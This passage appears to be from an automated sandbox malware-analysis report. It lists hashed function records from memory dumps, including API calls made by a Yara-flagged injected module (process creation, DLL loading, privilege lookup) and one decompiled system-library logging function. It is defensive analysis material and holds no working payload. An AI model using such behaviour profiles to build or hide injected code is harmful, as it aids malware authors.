                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: af39fa7aec2988375c73dd474cabc247aa95513a668ec662f5669205adc45c9b
                                      • Instruction ID: 421ce48f40ad8fada3e3ccc31c42136bd388ff0ac9ec12ff34e035d9825e1d9c
                                      • Opcode Fuzzy Hash: af39fa7aec2988375c73dd474cabc247aa95513a668ec662f5669205adc45c9b
                                      • Instruction Fuzzy Hash: 9D900261242085539589F55955045474016E7E4281791C026E1405950CC766A856E661
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: d54ee4f8c820a00bdac21fc6ec96daf164a28daff8a954be7e8c58d5ff6332e8
                                      • Instruction ID: 67137494528a995043eea13f7fed12454e4768c8bedcca17e02ea5569ce72d55
                                      • Opcode Fuzzy Hash: d54ee4f8c820a00bdac21fc6ec96daf164a28daff8a954be7e8c58d5ff6332e8
                                      • Instruction Fuzzy Hash: F090027120104813D155A55956047470019D7D4281F91C426E0415558DD7969952B161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 83befdbab9f969cf35fc842cdf8a5c5a7be4848ad294c221c7c0008b4741376a
                                      • Instruction ID: 635d0833e6c9369b189209c69381cd9c8c99c80ce2e5650e4545415059e32a98
                                      • Opcode Fuzzy Hash: 83befdbab9f969cf35fc842cdf8a5c5a7be4848ad294c221c7c0008b4741376a
                                      • Instruction Fuzzy Hash: B290027120104803D144A99965086860015D7E4341F51D025E5015555EC7A598917171
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 1b12089d5fdcf586c6423ec27c6e584fce88c03e000c895462985a9f5a0365bf
                                      • Instruction ID: b4d9629c61661fa4022002ea65a5bf47da14f02eb3400f9dc7860756a2ebc29d
                                      • Opcode Fuzzy Hash: 1b12089d5fdcf586c6423ec27c6e584fce88c03e000c895462985a9f5a0365bf
                                      • Instruction Fuzzy Hash: 5590026921304403D1C4B559650864A0015D7D5242F91D429E0006558CCB5598696361
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 9c2b4e108cb61b5b082f41460461a6532336c4a496503314cd7b477bff67567a
                                      • Instruction ID: ef3226327dd4b1b97da44744784835ee260b6acce2e213cc9b51aaaf92e45691
                                      • Opcode Fuzzy Hash: 9c2b4e108cb61b5b082f41460461a6532336c4a496503314cd7b477bff67567a
                                      • Instruction Fuzzy Hash: 4090027131118803D154A55995047460015D7D5241F51C425E0815558DC7D598917162
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 306c0f266334f7a88cd0fb035f80984c23a0879193efdee5c4606e030673da57
                                      • Instruction ID: a8200ebd2e6c839ad38916143d99a1ac24d0e40c02793af735ad860f2f286e34
                                      • Opcode Fuzzy Hash: 306c0f266334f7a88cd0fb035f80984c23a0879193efdee5c4606e030673da57
                                      • Instruction Fuzzy Hash: C690027120508C43D184B5595504A860025D7D4345F51C025E0055694DD7659D55B6A1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 47a2dea4e866d81f5922e9552e0422e6e310a80a033b1bd9daa885a83cb779e2
                                      • Instruction ID: c011abc94e82a1378dc281c3bcf9bef983074d5fd8621c59e4a2ea1cca40d5f0
                                      • Opcode Fuzzy Hash: 47a2dea4e866d81f5922e9552e0422e6e310a80a033b1bd9daa885a83cb779e2
                                      • Instruction Fuzzy Hash: 5190027120104C03D1C4B559550468A0015D7D5341F91C029E0016654DCB559A5977E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 2f52d63f52b9600d7af970ead61cadae1f6a0615d6a78883bcbc4d728bf58a6a
                                      • Instruction ID: 30186fe849ebc6f9a8bd39f6e214971e8cdb807f55ad1e04ae820a651bcadd4f
                                      • Opcode Fuzzy Hash: 2f52d63f52b9600d7af970ead61cadae1f6a0615d6a78883bcbc4d728bf58a6a
                                      • Instruction Fuzzy Hash: 9C90027120104C43D144A5595504B860015D7E4341F51C02AE0115654DC755D8517561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 0b82ecdb383a18cb88daf53bbc7b67407309c525d2209ed5539b90caa20c7064
                                      • Instruction ID: 29334daa77444d0af48ddf00f2e09aa1e0b8fdc1c890897be374221b939699f4
                                      • Opcode Fuzzy Hash: 0b82ecdb383a18cb88daf53bbc7b67407309c525d2209ed5539b90caa20c7064
                                      • Instruction Fuzzy Hash: 7F9002712010CC03D154A559950478A0015D7D4341F55C425E4415658DC7D598917161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 2166c1889b0313da0f7dfb0fdcdb0d95ec13b3ff26f0956e9cb9e8e7e686f184
                                      • Instruction ID: c7073befde21fbc7ab43128da59ac6adc888915ad0806d192afdfe5575561c5f
                                      • Opcode Fuzzy Hash: 2166c1889b0313da0f7dfb0fdcdb0d95ec13b3ff26f0956e9cb9e8e7e686f184
                                      • Instruction Fuzzy Hash: F290047531104403414DFD5D17045470057D7DD3D1351C035F1007550CD771DC717171
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: eaaec4c739684270e9f679b1a8f27cb2e3d49b72a1e3a9c723887c49ac51a2ce
                                      • Instruction ID: e1eafa1c05ea8a5f7e6630f376c780d745f4061644fc923d57d4ac5803bc018b
                                      • Opcode Fuzzy Hash: eaaec4c739684270e9f679b1a8f27cb2e3d49b72a1e3a9c723887c49ac51a2ce
                                      • Instruction Fuzzy Hash: 369002A1202044038149B5595514656401AD7E4241B51C035E1005590DC76598917165
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00353AF8), ref: 0036A09D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      • Opcode ID: 25d34981c3e28e2558f7aab2208c8299a2011b770cc52e9718ee7f968d014376
                                      • Instruction ID: 010601394439ed214749d3cf2af8a6a49f467f54391f8b05dd428b2922b2aede
                                      • Opcode Fuzzy Hash: 25d34981c3e28e2558f7aab2208c8299a2011b770cc52e9718ee7f968d014376
                                      • Instruction Fuzzy Hash: 0901D6752006046FD714DF64CC85EE33B68EF88350F118599F95C6B242C234E9148BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00353AF8), ref: 0036A09D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID: .z`
                                      • API String ID: 3298025750-1441809116
                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                      • Instruction ID: b3ee174c2594a52c296dc146d252094f1943a0fdcb0d04df242f56b813188658
                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                      • Instruction Fuzzy Hash: 42E04FB12002086BD714DF59CC45EA777ACEF88750F118554FD086B241C630F910CAF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0035834A
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0035836B
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: 814a7c8b3497c8af4cd9528356a9d6a35719265d1fe4414fe3761df5f58c27ba
                                      • Instruction ID: eac687e26d816cc113b7a0e9517dc1609ab88abebd23401cc1d22543bd513e08
                                      • Opcode Fuzzy Hash: 814a7c8b3497c8af4cd9528356a9d6a35719265d1fe4414fe3761df5f58c27ba
                                      • Instruction Fuzzy Hash: 9501B135A806287AE722AA959C03FBE772CAF40F51F054118FF04BE1C5E694A90A46E6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0035834A
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0035836B
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: 044c298a1d06f307a8119cdef661a26d78d53576b52967b50bafe86328bcddef
                                      • Instruction ID: 7e3042a056503dea08b08aeb2affd80521514eea4df9faed04582eab8821186f
                                      • Opcode Fuzzy Hash: 044c298a1d06f307a8119cdef661a26d78d53576b52967b50bafe86328bcddef
                                      • Instruction Fuzzy Hash: E701A231A802287BE722AA959C43FBE776CAB40F51F054118FF04BE1C5EAD4690A46F6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0035AD42
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                      • Instruction ID: 2b8e1dacf3166e2ae76de14e3fc7250263ca3d645bcd39de93496141580b1581
                                      • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                      • Instruction Fuzzy Hash: 160152B5D0010DA7DF10EBE4DC42FADB3B89B14308F008194AD089B145F671EB088B91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0036A134
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 569332285c2d9c38515a7562ab613dbc98f96d3325256dae3e0c05f2b161810a
                                      • Instruction ID: e0dba6a908b50d81654cb862ea96e926d255f5358157d2f58a2e85273f449e70
                                      • Opcode Fuzzy Hash: 569332285c2d9c38515a7562ab613dbc98f96d3325256dae3e0c05f2b161810a
                                      • Instruction Fuzzy Hash: 7A01EFB2200208AFCB14CF98DC80EEB37ADAF8C754F158218FA4DA7244C630E851CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0036A134
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction ID: ef933fdcf42811b9431cc881c3ab60840c4c6ef86934b49221add0c65dddf7e0
                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction Fuzzy Hash: B101AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0DA7241C630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,00358CF4,?), ref: 0035F6CB
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: 04c029aa51a440f7d80636e5d46265682d76a6efe01c60b34d8c71ae27644b3e
                                      • Instruction ID: cfa543cb0860b19cdf48e16be9f516a6b69595480e116785c076ccfef05c33dd
                                      • Opcode Fuzzy Hash: 04c029aa51a440f7d80636e5d46265682d76a6efe01c60b34d8c71ae27644b3e
                                      • Instruction Fuzzy Hash: F8E0C2A0AA83493DFB12BAB46C02F577A494B12394F8645B4F98CE90EBD80980194539
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlAllocateHeap.NTDLL(00364506,?,00364C7F,00364C7F,?,00364506,?,?,?,?,?,00000000,00000000,?), ref: 0036A05D
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction ID: 47f97f9797172e692d5ac00d897cbc7df69add644fa493eae7d0bd38e7103a02
                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction Fuzzy Hash: ADE046B1200208ABDB14EF99CC81EA777ACEF88750F118558FE086B242C630F910CBF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0035F1A2,0035F1A2,?,00000000,?,?), ref: 0036A200
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction ID: 7dabcf98fb4f58c840fa284c6e7477fb00a0ae1c09ae7cb236c15065fcd33c62
                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction Fuzzy Hash: FAE01AB12002086BDB10DF49CC85EE737ADEF88750F118154BA086B241CA30E8108BF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,00358CF4,?), ref: 0035F6CB
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                      • Instruction ID: 5e731e428d73f0739ea7cc3390b0b0f771c171b41a349aa9f13d513c9ed08f2d
                                      • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                      • Instruction Fuzzy Hash: 29D0A7717903043BE610FAA49C03F2732CD6B45B01F494074FA48DB3D7D950E4004165
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 60abe3b091eaf2e9f723b4da539aa8c01430d2c7feffe516f36e8a3322de262e
                                      • Instruction ID: aacd84676b7ad2ce9fbc254c28bc73596dbb935c872602302a01f66923fed0ab
                                      • Opcode Fuzzy Hash: 60abe3b091eaf2e9f723b4da539aa8c01430d2c7feffe516f36e8a3322de262e
                                      • Instruction Fuzzy Hash: 57B09BB19014D9C7D655D76457087177914BBD8741F16C065D1060641A4778D0D1F5B5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      C-Code - Quality: 53%
                                      			E031FFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                      				void* _t7;
                                      				intOrPtr _t9;
                                      				intOrPtr _t10;
                                      				intOrPtr* _t12;
                                      				intOrPtr* _t13;
                                      				intOrPtr _t14;
                                      				intOrPtr* _t15;
                                      
                                      				_t13 = __edx;
                                      				_push(_a4);
                                      				_t14 =  *[fs:0x18];
                                      				_t15 = _t12;
                                      				_t7 = E031ACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                      				_push(_t13);
                                      				E031F5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                      				_t9 =  *_t15;
                                      				if(_t9 == 0xffffffff) {
                                      					_t10 = 0;
                                      				} else {
                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                      				}
                                      				_push(_t10);
                                      				_push(_t15);
                                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                                      				return E031F5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                      			}











                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 031FFDFA
                                      Strings
                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 031FFE01
                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 031FFE2B
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                      • API String ID: 885266447-3903918235
                                      • Opcode ID: 0702322ad4f424dfc7adaccd605a7f816d7705e39287068b7d295628dafd272e
                                      • Instruction ID: 860d54f27322c2df18d93b74fe70cca3f751103a9b7f61bcf1285b811469ee35
                                      • Opcode Fuzzy Hash: 0702322ad4f424dfc7adaccd605a7f816d7705e39287068b7d295628dafd272e
                                      • Instruction Fuzzy Hash: 4EF0F637640601BFD6249A45DC02F27BF5AEB49770F150314F7285A1D2EBA2F87186F0
                                      Uniqueness

                                      Uniqueness Score: -1.00%